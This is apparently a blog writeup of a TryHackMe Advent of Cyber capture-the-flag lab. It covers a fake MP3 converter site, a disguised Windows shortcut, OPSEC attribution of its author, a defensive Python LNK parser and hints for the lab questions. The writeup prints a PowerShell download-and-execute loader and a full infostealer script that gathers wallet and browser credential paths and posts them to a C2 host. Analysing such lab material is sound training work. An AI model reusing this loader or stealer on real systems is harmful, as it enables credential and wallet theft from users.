TryHackMe - Advent of Cyber 2024 Day 1

Happy December 1st! Since today is the first of the month, it is also the first day of TryHackMe’s holiday event, Advent of Cyber! To go along with the holiday season and this event of daily challenges, I’m going to try my best to complete the new challenge each day, and on some days I might post a writeup here, like I am today. This won’t be a daily thing, as each day’s challenge is fairly long and I am fast approaching finals week, but I’ll post here when possible. Let’s get into the first one!


What is Advent of Cyber?

Advent of Cyber is a holiday event hosted by TryHackMe. Each day in December leading up to Christmas, a new festive-themed exercise is released. It’s a free challenge available to all TryHackMe users and is beginner-friendly. The more questions you complete, the higher your chance of winning prizes.


Day 1: Maybe SOC-mas music, he thought, doesn't come from a store?

The learning objectives of today’s challenge include:

  • Learning how to investigate malicious link files

  • Learning about OPSEC and OPSEC mistakes

  • Understanding how to track and attribute digital identities in cyber investigations

Once you have started the machine, visit the website at the machine’s IP in your web browser. It’s a YouTube-to-MP3 converter website. Three things to watch out for when using sites like this are malvertising, phishing scams, and bundled malware, so hopefully you are completing this challenge in a virtualized environment rather than on your host machine.

To investigate the website further, paste a link into the input box, hit convert, choose either MP3 or MP4, and lastly hit download. It doesn’t matter which link you use as long as it’s a valid YouTube link; for example, https://www.youtube.com/watch?v=dQw4w9WgXcQ. Once downloaded, find the zip file in your Downloads folder and extract it. You should see two files, song.mp3 and somg.mp3. Running ‘file [filename]’ on each reveals what the file actually is, regardless of its extension.

As you can see, there is quite a big difference between the two files: song.mp3 really is an MP3 file, but somg.mp3 is actually an “MS Windows shortcut”, i.e. a .lnk file, renamed to look like audio. To inspect it further, run ‘exiftool somg.mp3’, which prints quite a bit of metadata, including the shortcut’s command-line arguments, which here are a PowerShell command.

The command, -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\ProgramData\s.ps1'); iex (Get-Content 'C:\ProgramData\s.ps1' -Raw)", does the following:

  • “-ep Bypass -nop”: -ep (-ExecutionPolicy) Bypass tells PowerShell to run the script regardless of the machine’s execution policy, and -nop (-NoProfile) skips loading the user’s profile scripts. The execution policy is a safety setting, not a security boundary, so this alone is enough to run unsigned code; -c (-Command) then runs the quoted string

  • “DownloadFile”: the .NET System.Net.WebClient method that fetches a file from a remote URL and saves it to a path on the target machine; here it pulls a PowerShell script, IS.ps1, from what looks to be a raw GitHub URL and writes it to C:\ProgramData\s.ps1

  • “iex”: the alias for Invoke-Expression, which evaluates the downloaded script’s text (read back with Get-Content -Raw) as PowerShell code. Dropping a script into ProgramData and invoking it this way is a very common loader pattern
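Rather than relying only on file and exiftool, it helps to know what those tools are actually reading. The following is an added example (not code from the writeup or from TryHackMe): a minimal parser for the Shell Link (.lnk) format that walks the header, skips the optional LinkTargetIDList and LinkInfo blocks, and pulls out the StringData fields where the target path and command-line arguments live, plus a small triage check for the tells seen above (a non-.lnk extension, a PowerShell target, loader-style arguments). The sample shortcut is constructed in the script so it runs offline; the arguments are the ones from the page, but the relative target path and the suspicious-token list are my own assumptions.

```python
import struct

# Constants from MS-SHLLINK (Shell Link binary format).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C

# LinkFlags bits that matter for reaching and reading StringData.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData sections appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = (
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
)

# Argument tokens that are red flags in a shortcut's command line (assumed list, not from the page).
SUSPICIOUS_TOKENS = ("-ep bypass", "-nop", "-w hidden", "-enc", "downloadfile",
                     "downloadstring", "iex", "invoke-expression")


def _read_string(buf, off, unicode):
    """Read one StringData entry: a 2-byte character count followed by the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        raw = buf[off:off + 2 * count]
        return raw.decode("utf-16-le"), off + 2 * count
    raw = buf[off:off + count]
    return raw.decode("cp1252"), off + count


def parse_lnk(data):
    """Return the StringData fields of a Shell Link file, or raise ValueError if it is not one."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a Shell Link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("missing Shell Link header/CLSID")
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip IDList: 2-byte size, then the items
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # skip LinkInfo: its first dword is the total size
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size
    info = {"flags": flags}
    for key, bit in STRING_FIELDS:
        info[key] = None
        if flags & bit:
            info[key], off = _read_string(data, off, bool(flags & IS_UNICODE))
    return info


def triage(filename, data):
    """Findings an analyst cares about: extension mismatch, PowerShell target, loader arguments."""
    try:
        info = parse_lnk(data)
    except ValueError:
        return []                                # not a LNK at all, nothing to report here
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext != "lnk":
        findings.append(f"Shell Link content hiding behind .{ext} extension")
    if "powershell" in (info["relative_path"] or "").lower():
        findings.append(f"shortcut target is PowerShell: {info['relative_path']}")
    args = (info["arguments"] or "").lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in args]
    if hits:
        findings.append("loader-style arguments: " + ", ".join(hits))
    return findings


# --- Constructed sample so the script runs offline ---------------------------
def _string_data(text):
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_sample_lnk(relative_path, arguments):
    """Minimal valid LNK: 76-byte header + RelativePath + Arguments + empty ExtraData terminator."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + _string_data(relative_path) + _string_data(arguments) + b"\x00" * 4


# The target path is an assumption (the writeup only shows the arguments); the arguments are the page's.
SAMPLE_TARGET = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGS = ("-ep Bypass -nop -c \"(New-Object Net.WebClient).DownloadFile("
               "'https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1',"
               "'C:\\ProgramData\\s.ps1'); iex (Get-Content 'C:\\ProgramData\\s.ps1' -Raw)\"")
SAMPLE_LNK = build_sample_lnk(SAMPLE_TARGET, SAMPLE_ARGS)

if __name__ == "__main__":
    print(parse_lnk(SAMPLE_LNK)["arguments"])
    for line in triage("somg.mp3", SAMPLE_LNK):
        print("[!]", line)
```

Nothing here executes the shortcut or fetches the URL; the parser only reads bytes. On a real sample you would call parse_lnk(open("somg.mp3", "rb").read()) and, if a LinkInfo block is present, the LocalBasePath inside it often reveals the attacker’s build machine as well, which is exactly the kind of OPSEC artifact the rest of this challenge is about.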

The contents of the file that would be downloaded:

function Print-AsciiArt {
    Write-Host "  ____     _       ___  _____    ___    _   _ "
    Write-Host " / ___|   | |     |_ _||_   _|  / __|  | | | |"  
    Write-Host "| |  _    | |      | |   | |   | |     | |_| |"
    Write-Host "| |_| |   | |___   | |   | |   | |__   |  _  |"
    Write-Host " \____|   |_____| |___|  |_|    \___|  |_| |_|"

    Write-Host "         Created by the one and only M.M."
}

# Call the function to print the ASCII art
Print-AsciiArt

# Path for the info file
$infoFilePath = "stolen_info.txt"

# Function to search for wallet files
function Search-ForWallets {
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
    foreach ($path in $walletPaths) {
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}

# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"

    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}

# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"
    $data = Get-Content -Path $infoFilePath -Raw

    # Using Invoke-WebRequest to send data to the C2 server
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}

# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server

AGAIN, DO NOT EXECUTE THIS CODE ON A WINDOWS HOST MACHINE, A REMINDER TO COMPLETE THIS CHALLENGE ON A VIRTUALIZED ENVIRONMENT.

To continue the investigation we use the PowerShell script above. One line stands out: “Created by the one and only M.M.” Searching for this string on GitHub reveals a post in the Issues section of a repository, mentioning code very similar to the above, posted by a user, MM-WarevilleTHM.

Clicking into it and scrolling down reveals the script above, as well as some identifiable information pointing back to the user most likely behind all of this, revealing the identity of M.M. This is a classic case of OPSEC failure.

Operational Security (OPSEC) is a term originally coined by the military for the process of protecting sensitive information and operations from adversaries. From the attacker’s side, the goal is to find and remove anything that could let an investigator learn their identity before the investigator does. In cybersecurity, OPSEC mistakes such as reusing usernames, email addresses, or account handles, leaving identifiable metadata in code, documents, or images, posting publicly online, or failing to use a VPN or proxy all leave digital traces that can be tied together. Real-world examples include the takedown of AlphaBay admin Alexandre Cazes, and the public identification of members of the Chinese military hacking group APT1.

Questions

Question 1: Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author?

Look for “Artist” in the output of that command to find the author.

Question 2: The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?

Looking in the script for the function that mentions sending info to the C2 server will reveal the URL of the server.

Question 3: Who is M.M? Maybe his Github profile page would provide clues?

On the GitHub profile there are two popular repos. One is named “M.M”; clicking into it shows a README.md that shares a little about the user and some more info.

Question 4: What is the number of commits on the GitHub repo where the issue was raised?

The other repo on the profile contains the PowerShell script; look around there for the answer.

Question 5: If you enjoyed this task, feel free to check out the OPSEC room!

Question 6: What's with all these GitHub repos? Could they hide something else?


Conclusion

A very quick and easy first challenge to start off this year. This is the first time I’m taking part, as I wasn’t really a big TryHackMe user until this past summer while off from school. I’m looking forward to the festive challenges and can’t wait to see what else this year’s event brings us!